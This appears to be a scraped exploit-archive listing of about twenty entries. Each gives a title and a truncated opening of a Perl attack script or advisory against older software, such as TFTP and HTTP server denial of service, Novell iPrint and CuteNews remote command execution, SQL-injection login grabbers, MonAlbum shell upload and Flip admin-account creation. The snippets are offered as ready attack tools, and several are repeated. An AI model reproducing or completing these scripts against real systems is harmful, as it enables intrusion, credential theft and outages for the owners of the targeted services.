PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl Jeremy Brown [email protected]/jbrownsec.blogspot.com PacketTrap TFTPD DoS latest 2.2.5459.0 tested -- www.packettrap.com Must have Net::TFTP installed easy to install, 'cpan' then 'install Net::TFTP' ; A product of tftpfuzz.pl coming soon use...

Novell Iprint LPD Remote Code Execution Vulnerability

No description provided by source. !/usr/bin/perl Source: http://www.protekresearchlab.com/index.php?option=comcontent&view=article&id=21&Itemid=21 use Getopt::Std; use IO::Socket::INET; $SIGINT = \ my $host = '10.102.3.79'; my $port = 515; my $proto = 'tcp'; my $sockType = SOCKSTREAM; my $timeou...

Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/10040/info Encore Web Forum is reported prone to an issue that may allow a remote user to execute arbitrary commands on a system implementing the forum software. This issue is due to the application's failure to properly...

Subdreamer 2.2.1 - SQL Injection / Command Execution Exploit

No description provided by source. !/usr/bin/perl Subdreamer 2.2.1 command exec exploit @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ supported targets: without forum integration with phpBB2 integration with ipb2 integration with vbulletin2 integration...

CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit

No description provided by source. !/usr/bin/perl cijfer-cnxpl - CuteNews =1.4.1 Remote Command Execution Copyright c 2005 cijfer [email protected] All rights reserved. 1. example cijfer@kalma:/research$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news [email protected] /$ id;uname -a uid=48apache...

Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/10446/info Firebird is reported prone to a remote buffer-overrun vulnerability. The issue occurs because the application fails to perform sufficient boundary checks when the database server is handling database names. A...

mPDF <= 5.3 file disclosure and fix-vulnerability warning-the black bar safety net

Title: mPDF = 5.3 File Disclosure Author: ZadYree Download address: http://www.mpdf1.com/mpdf/download Affected versions: 5.3 and prior Test platform: multiple !/ usr/bin/perl-U =head1 TITLE mPDF = 5.3 File Disclosure Exploit 0day =head2 SYNOPSIS -- examples/showcode.php --...

Novell Iprint LPD Remote Code Execution

!/usr/bin/perl Source: http://www.protekresearchlab.com/index.php?option=comcontent&view=article&id=21&Itemid=21 use Getopt::Std; use IO::Socket::INET; $SIGINT = \ my $host = '10.102.3.79'; my $port = 515; my $proto = 'tcp'; my $sockType = SOCKSTREAM; my $timeout = 1; my %opt; my $optstring =...

Sysax Multi Server (SFTP module) Multiple Commands DoS Vulnerabilities

Exploit for windows platform in category dos / poc ====================================================================== Sysax Multi Server SFTP module Multiple Commands DoS Vulnerabilities ====================================================================== Title: Sysax Multi ServerSFTP modul...

Newsolved 1.1.6 (login grabber) Multiple SQL Injection Exploit

No description provided by source. !/usr/bin/perl -w Neversolved.pl Copyright c 2009 by jmp-esp.net A simple login grabber by lama - 06/23/2009 Tested on: Newsolved 1.1.6 use strict; use LWP::UserAgent; use Getopt::Std; use vars qw/ %opt /; getopts "i:p:u:lfh", %opt ; my @bugs =...

pktrp-dos.txt

!/usr/bin/perl Jeremy Brown [email protected]/jbrownsec.blogspot.com PacketTrap TFTPD DoS latest 2.2.5459.0 tested -- www.packettrap.com Must have Net::TFTP installed easy to install, 'cpan' then 'install Net::TFTP' ; A product of tftpfuzz.pl coming soon use Net::TFTP; use Getopt::Std; $tftp =...

phpnukekutubisitte-sql.txt

!/usr/bin/perl use Getopt::Std; use LWP::UserAgent; sub usg printf" --------------------------- | PHP-NUKE KutubiSitte kid = SQL Injection | --------------------------- Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 -------------- :::::::::::::::::::::::::::::...

MonAlbum 0.87 Upload Shell / Password Grabber Exploit

No description provided by source. !/usr/bin/env perl use strict; use warnings; use LWP::UserAgent; use HTTP::Request::Common; use Getopt::Std; my %args, $user, $password, $sqlhost, $sqluser, $sqlpassword, $cookie, $path, $file, $upload = ; my $tmp = 'cmd1.jpg'; getopts"u:a:f:p:", %args; -a don't...

MonAlbum 0.87 - Arbitrary File Upload / Password Grabber

!/usr/bin/env perl use strict; use warnings; use LWP::UserAgent; use HTTP::Request::Common; use Getopt::Std; my %args, $user, $password, $sqlhost, $sqluser, $sqlpassword, $cookie, $path, $file, $upload = ; my $tmp = 'cmd1.jpg'; getopts"u:a:f:p:", %args; -a don't retrieve login and passwords, use...

Flip &lt;= 3.0 Remoe Admin Creation Exploit

No description provided by source. !/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip = 3.0"; my $type = "Admin Creation"; my $author = "undefined1"; my $vendor = "http://sourceforge.net/projects/flipsource"; my %opt; getopts"t:", %opt; $| = 1; print ":: $app $type - by...

Flip 3.0 - Remote Admin Creation

Flip 3.0 - Remote Admin Creation !/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admi...

Flip 3.0 - Remote Admin Creation

!/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admin ... \t"; my $content =...

Wireshark &lt; 0.99.5 - DNP3 Dissector Infinite Loop

!/usr/bin/perl Automatically generated by beSTORMtm Copyright Beyond Security c 2003-2007 $Revision: 3741 $ Attack vector: M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 Module: DNP3 use strict; use warnings; use Getopt::Std; use IO::Socket::INET; $SIGINT = \ my $host = '192.168.4.52'; my $port = 20000; my...

HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl GetOpt STD module use IO::Socket; use Getopt::Std; getopts":i:p:",%args; ifdefined $argsi $ip = $argsi; ifdefined $argsp $port = $argsp; if!defined $argsi or !defined $argsp print "-----------------------------------------------------\n"; print...

httpsv162-dos.txt

!/usr/bin/perl GetOpt STD module use IO::Socket; use Getopt::Std; getopts":i:p:",%args; ifdefined $argsi $ip = $argsi; ifdefined $argsp $port = $argsp; if!defined $argsi or !defined $argsp print "-----------------------------------------------------\n"; print "HTTP SERVER httpsv1.6.2 404 Denial o...